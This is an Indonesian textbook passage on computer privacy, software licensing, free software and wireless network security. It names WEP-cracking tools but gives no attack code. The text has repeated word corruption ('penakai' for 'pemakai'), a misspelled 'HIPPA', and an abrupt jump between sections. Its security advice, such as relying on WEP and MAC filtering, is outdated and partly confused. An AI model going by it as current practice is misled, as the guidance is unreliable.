Sementara itu, demi menjaga keamanan dan tingkat performance dari

sistem yang dikelolanya, seorang administrator seringkali harus mengetahui

apa yang dilakukan oleh pemakai sistemnya.

Sebagai contoh kasus, seorang administrator merasa bahwa salah satu

pemakainya mendapat serangan mailbomb dari orang lain dengan

mengamati jumlah dan ukuran email yang diterima sang pemakai. Adanya

serangan mailbomb ini dapat menurunkan performance sistem yang

dikelolanya, bahkan bisa jadi server yang dipakai  bisa menjadi macet

(hang). Kalau server macet, berarti pemakai lain tidak dapat mengakses

emailnya. Masalahnya, untuk memastikan bahwa pemakai yang

bersangkutan mengalami serangan mailbomb administrator harus melihat

 (mengintip?) email dari sang pemakai tersebut. Hal ini menjadi pertanyaan,

karena hal ini dapat dianggap melanggar privacy dari pemakai yang

bersangkutan.

penakai an cookie di sistem WWW untuk tracking pembaca (penakai )

juga dapat di-abuse sehingga sebuah situs dapat memantau kegiatan

seorang penakai ; kemana dia pergi, apa saja yang dia beli, dan seterusnya.

Hal ini sudah jelas melanggar privacy. Masalahnya, sistem web yaitu 

sistem yang connectionless / stateless sehingga dibutuhkan cookie untuk

mengingat-ingat penakai  tersebut.

Masalah privacy juga muncul di bidang kesehatan (health care). Data-data

pasien harus dijaga ketat. Untuk itu institusi yang mengelola dan

mengirimkan data-data pasien (seperti rumah sakit, perusahaan asuransi)

harus dapat menjamin kerahasiannya. Hal ini sulit mengingat transaksi

antar institusi yang melewati batas fisik negara sering dilakukan dan setiap

negara memiliki aturan yang berbeda dalam hal privacy ini. Negara

Amerika Serikat, misalnya, akan menerapkan Health Insurance Portability

and Accountability Act (HIPPA), yang sangat ketat dalam menjaga

kerahasiaan data-data pasien.

Salah satu topik yang sering berhubungan dengan privacy yaitu 

penakai an “key escrow” atau “key-recovery system”, dimana pemerintah

dapat membuka data yang sudah terenkripsi dengan kunci khusus.

Masyarakat umumnya tidak setuju dengan penakai an key-recovery

system ini, seperti diungkapkan dalam survey IEEE Computer [22]: “77%

of members agree that key-recovery systems make it too easy for

government to access encrypted data without permission.”

Lisensi Software

Pembahasan topik lisensi software dapat menjadi satu buku tersendiri. Pada

bagian ini akan diulas secara singkat permasalahan yang terkait dengan

lisensi software.

Software tersimpan dalam bentuk bilangan biner (“1” dan “0”) sehingga

dapat diduplikasi dengan mudah dan murah. Proses duplikasi dapat

dilakukan secara fisik - melalui disket, CD-ROM, DVD, dan flash disk -

atau melalui jaringan - melalui ftp, web, torrent. Yang disebut softwarenya

itu sendiri yaitu  isinya (yang berbentuk bilangan biner tersebut), lepas dari

medianya. Yang dibeli yaitu  softwarenya. Maka bentuk ekonomisnya

yaitu  lisensi.

Sejarahnya, software tidak dijual terpisah dari perangkat keras. Biasanya

software di-bundled dengan perangkat keras yang mahal harganya, seperti

mainframe. Software pada saat itu lebih banyak dikembangkan oleh peneliti

dan tukang utak-atik saja. Lisensi software sifatnya public domain.

Kemudian komputer pribadi mulai muncul. Mulai muncul software yang

dapat dipakai dahulu, jika suka maka mengirimkan uang untuk registrasi,

yang biasanya berkisar antara $5 sampai dengan $25. Lisensi seperti ini

disebut shareware. Software-software games mulai memakai  lisensi

shareware tersebut. Games dapat diambil dari berbagai BBS (Bulletin

Board System) dan dicoba dahulu sebelum dibayar.

Kemudian komputer ukuran kecil mulai banyak dipakai  di perusahaan,

maka muncul lisensi yang bersifat komersial. Microsoft merupakan salah

satu pionir dalam lisensi komersial ini.

Lisensi yang ada kemudian dianggap kurang cocok dengan kebutuhan yang

ada. Dalam perjalanannya muncul beberapa jenis lisensi baru seperti

misalnya GNU Public License (GPL), BSD, Apache, dan seterusnya1

.

Free Software Movement

Software berbayar tadinya tidak terlalu bermasalah. Akan tetapi dalam

perjalanannya, seorang penakai  menjadi sangat bergantung kepada

pembuat software. Jika ada sesuatu yang tidak jalan atau ada kesalahan

(bugs, errors) maka sang penakai  harus menunggu sampai dibetulkan oleh

vendor. Bahkan kadang-kadang vendor menerapkan biaya untuk perbaikan

atau update ini. Sungguh lebih nyaman jika source code dari software

tersedia.

Ide untuk membuat free software muncul dari Richard Stallman ketika dia

berada di MIT. Dia merasa bahwa software itu seharusnya free. Kata “free”

dalam Bahasa Inggris memiliki arti ganda, yaitu “freedom” (bebas) dan

“free” dalam artian gratis. Richard Stallman lebih memfokuskan kepada

makna yang pertama, bebas.


 Sistem wireless mulai populer. Hal ini dimulai dengan maraknya cellular

phone (handphone) di dunia yang pada mulanya hanya memberikan akses

voice. Kemudian handphone dapat pula dipakai  untuk mengirimkan

data. Sebagai catatan, jumlah penakai  handphone di dunia (selain di

Amerika Utara) sudah mengalahkan jumlah penakai  Internet. Di

Indonesia sendiri, saat ini terdapat lebih dari 4 juta pelanggan handphone

sementara hanya ada 1,5 juta penakai  Internet. Dengan kata lain,

handphone lebih merasuk dibandingkan  Internet yang memakai  jaringan

yang fixed (wired).

SMS merupakan salah satu aplikasi penting di dunia wireless, khususnya di

Asia. Anda dapat lihat di jalanan, di kantor, dan dimana saja orang menekan

tombol handphonenya untuk mengirim SMS. Jutaan SMS dikirimkan setiap

harinya. Hal ini tidak terduga oleh operator wireless. Bahkan ada yang

mengatakan bahwa SMS merupakan killer application di dunia wireless.

Di sisi lain perangkat komputer mulai muncul dalam ukuran yang kecil dan

portable. Personal Digital Assistant (PDA) seperti Palm, Handspring,

Symbian, Windows CE mulai banyak dipakai  orang. Perangkat ini tadinya bersifat standalone atau hanya memiliki fasilitas transfer data

dengan memakai  kabel serial (ke komputer) dan IrDa (infra red antar

perangkat). Kemudian muncul perangkat yang memungkinkan komputer

berkomunikasi dengan memakai  wireless LAN (seri IEEE 802.11) dan

Bluetooth. Semakin marak dan laju perkembangan komunikasi data secara

wireless.

Secara umum, tekonologi wireless dapat dibagi menjadi dua:

• Cellular-based technology: yaitu solusi yang memakai  saluran

komunikasi cellular atau pager yang sudah ada untuk mengirimkan data.

Jangkauan dari cellullar-based biasanya cukup jauh.

• Wireless LAN (WLAN): yaitu komunikasi wireless dalam lingkup area

yang terbatas, biasanya antara 10 s/d 100 meter dari base station ke

Access Point (AP).

Kedua jenis teknologi di atas tidak berdiri sendiri, melainkan memiliki

banyak teknologi dan standar yang berbeda (dan bahkan terdapat konflik).

Contohnya:

• Cellullar: GSM, CDMA, TDMA, CDPD, GPRS/EDGE, 2G, 2.5G, 3G,

UMTS

• LAN: keluarga IEEE 802.11 (seperti 802.11b, 802.11a, 802.11g),

HomeRF, 802.15 (Personal Area Network) yang berbasis Bluetooth,

802.16 (Wireless Metropolitan Area Network)

Kelihatannya akan ada konvergensi dari teknologi wireless dan juga dari

perangkat pengakses informasi ini. Siapa pemenangnya? masih terlalu dini

untuk diputuskan.

Komunikasi wireless banyak disukai dikarenakan banyak keuntungan atau

kemudahan, yaitu antara lain:

• Kenyamanan dengan adanya fasilitas roaming sehingga dapat dihubungi

dan dapat mengakses informasi dimana saja.

• Komunikasi wireless memungkinkan penakai  bergerak dan tidak

terikat pada satu tempat saja. Seorang eksekutif yang disopiri dapat

mengakses emailnya di mobilnya ketika jalan sedang macet. Seorang

pekerja dapat membawa notebooknya ke luar dan bekerja dari halaman

yang rindang.

• Kecepatan dari komunikasi wireless sudah memasuki batas kenyamanan

penakai . Kecepatan ini masih akan terus meningkat.

• Mulai muncul aplikasi yang memakai  fasilitas wireless, seperti

misalnya location-specific applications.

Masalah Keamanan Sistem Wireless

Sistem wireless memiliki permasalahan keamanan tersendiri (khusus).

Beberapa hal yang mempengaruhi aspek keamanan dari sistem wireless

antara lain:

• Perangkat pengakses informasi yang memakai  sistem wireless

biasanya berukuran kecil sehingga mudah dicuri. Laptop, notebook,

handphone, palm, dan sejenisnya sangat mudah dicuri. Jika dia dicuri,

maka informasi yang ada di dalamnya (atau kunci pengakses informasi)

bisa jatuh ke tangan orang yang tidak berhak.

• Penyadapan (man-in-the-middle attack) dapat dilakukan lebih mudah

karena tidak perlu mencari jalur kabel untuk di-‘tap’. Sistem yang tidak

memakai  pengamanan enkripsi, atau memakai  enkripsi yang

mudah dipecah, akan mudah ditangkap.

• Perangkat wireless yang kecil membatasi kemampuan perangkat dari sisi

CPU, RAM, kecepatan komunikasi, catu daya. Akibatnya sistem

pengamanan (misalnya enkripsi) yang dipakai  harus memperhatikan

batasan ini. Saat ini tidak memungkinkan untuk memakai  sistem

enkripsi yang canggih yang membutuhkan CPU cycle yang cukup tinggi

sehingga memperlambat transfer data.

• penakai  tidak dapat membuat sistem pengaman sendiri (membuat

enkripsi sendiri) dan hanya bergantung kepada vendor (pembuat

perangkat) tersebut. Namun mulai muncul perangkat handphone yang

dapat diprogram oleh penakai

• Adanya batasan jangkauan radio dan interferensi menyebabkan

ketersediaan servis menjadi terbatas. DoS attack dapat dilakukan dengan

menginjeksikan traffic palsu.

• Saat ini fokus dari sistem wireless yaitu  untuk mengirimkan data

secepat mungkin. Adanya enkripsi akan memperlambat proses

pengiriman data sehingga penakai an enkripsi masih belum mendapat

prioritas. Setelah kecepatan pengiriman data sudah memadai dan

harganya menjadi murah, barulah kita akan melihat perkembangan di

sisi pengamanan dengan memakai  enkripsi.

Contoh Kasus Lubang Keamanan Sistem 

Wireless

Beberapa contoh kasus lubang keamanan sistem wireless antara lain:

• Cloning sistem cellular berbasis AMPS sehingga “pulsa” pelanggan

dapat dicuri oleh orang lain yang tidak berhak.

• Enkripsi A5 dari sistem seluler GSM yang dibatasi kemampuan dan

dirahasiakan algoritmanya. Algoritma yang dirahasiakan dianggap tidak

aman karena tidak melalui proses review yang terbuka.

• Peneliti di Amerika sudah membuktikan bocornya LAN perusahaan

yang memakai  wireless LAN IEEE 802.11b. Dengan memakai 

sebuah notebook yang dilengkapi dengan perangkat IEEE 802.11b

seorang peneliti sambil berjalan menunjukkan LAN dan data-data dari

beberapa perusahaan yang bocor ke jalan di depan kantor. penakai an

firewall untuk membatasi akses ke kantor dari Internet akan sia-sia jika

pintu belakang (backdoor) wireless LAN bisa dipakai  oleh cracker

untuk masuk ke sistem. Program untuk memecahkan wireless LAN ini

mulai banyak tersedia di Internet, seperti misalnya Airsnort,

Netstumbler1

, WEPcrack, dan lain-lain.

• NIST (lembaga standar di Amerika) melarang penakai an wireless

LAN untuk institusi pemerintah yang memiliki data-data rahasia.

Pengamanan Sistem Wireless

Untuk sistem wireless LAN yang memakai  IEEE 802.11b, disarankan

untuk mensegmentasi jaringan dimana wireless LAN ini berada dan

menganggap segmen ini sebagai extranet. Jika diperlukan, firewall

dipakai  untuk membatasi jaringan ini dengan jaringan internal yang

membutuhkan keamanan lebih tinggi.

Untuk meningkatkan keamanan, gunakan MAC address sebagai mekanisme

untuk memperbolehkan connection (access control). Kerugian dari

mekanisme ini yaitu  kecepatan maksimum yang dapat diperoleh yaitu 

sekitar 11 Mbps. (Secara teori MAC address masih dapat diserang dengan

memakai  proxy arp.) Akses dengan memakai  MAC ini masih

belum membatasi penyadapan.

Enkripsi seperti WEP dipakai  untuk menghindari dan mempersulit

akses. WEP sendiri masih memiliki banyak masalah teknis, dimana crack

(pemecahan) enkripsi WEP membutuhkan computing resources yang

dimiliki oleh orang-orang tertentu. Di masa yang akan datang akan ada

pengamanan yang lebih baik.

Aplikasi yang memakai  perangkat wireless sebaiknya memakai 

mekanisme enkripsi end-to-end, dengan menganggap jaringan sebagai

sistem yang tidak aman.